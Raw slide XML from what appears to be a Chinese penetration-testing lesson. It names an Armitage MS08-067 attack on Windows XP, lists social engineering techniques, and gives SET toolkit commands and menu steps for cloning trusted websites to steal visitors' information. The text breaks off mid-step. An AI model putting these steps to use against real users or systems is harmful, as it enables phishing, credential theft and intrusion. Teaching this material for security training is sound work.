            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1055915" y="1898221"/>
            <a:ext cx="9889068" cy="4796493"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{539C0DA0-CDD3-37D2-8B8C-2AAA7B13CCE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="661305" y="1274020"/>
            <a:ext cx="10474779" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>armitage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>实现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>windows XP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>远程溢出漏洞：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ms08_067_netapi</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="650083319"/>
      </p:ext>
    </p:extLst>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774700"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>社会工程学攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1930400"/>
            <a:ext cx="11699875" cy="1374775"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>社会工程学攻击主要是利用人们的好奇心、信任、贪婪以及一些愚蠢的错误，攻击人们自身的弱点。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Kali Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>提供了一个社会工程学工具集</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>，可以用来实施社会工程学攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" u="none" strike="noStrike" baseline="0" dirty="0">
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2561493" y="3167639"/>
            <a:ext cx="2678723" cy="2123658"/>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zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>环境渗透</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>引诱</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>伪装</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>说服</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5685692" y="3167639"/>
            <a:ext cx="2678723" cy="1615827"/>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zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恐吓</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>恭维</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>反社会工程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4004458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61950" y="901700"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>启动社会工程学工具包（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535940" y="1987233"/>
            <a:ext cx="11347450" cy="1146175"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>社会工程学工具包（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>）是一个开源的、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>驱动的社会工程学渗透测试工具。使用该工具包，可以实施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>向量攻击、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>PoweShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>攻击等。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>~#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>setoolkit</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>set&gt; 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772381" y="3662160"/>
            <a:ext cx="5695238" cy="2628571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2446565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881063"/>
            <a:ext cx="10515600" cy="1325562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="1" kern="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>向量攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1819275"/>
            <a:ext cx="11578590" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>攻击向量将会特意构造出一些对目标而言是可信且具有诱惑力的网页。当目标用户访问该网页后，即可窃取到目标用户的信息。社会工程学攻击工具包可以克隆出和实际运行的可信站点外观完全一样的网页，这使得受害者认为他们正在浏览一个合法站点。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：启动</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>SET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：选择菜单第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>项：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Social-Engineering Attacks:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>社会工程学攻击</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>：继续选择菜单第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>项：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Website Attack Vectors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>（网站攻击向量）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t> 步骤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
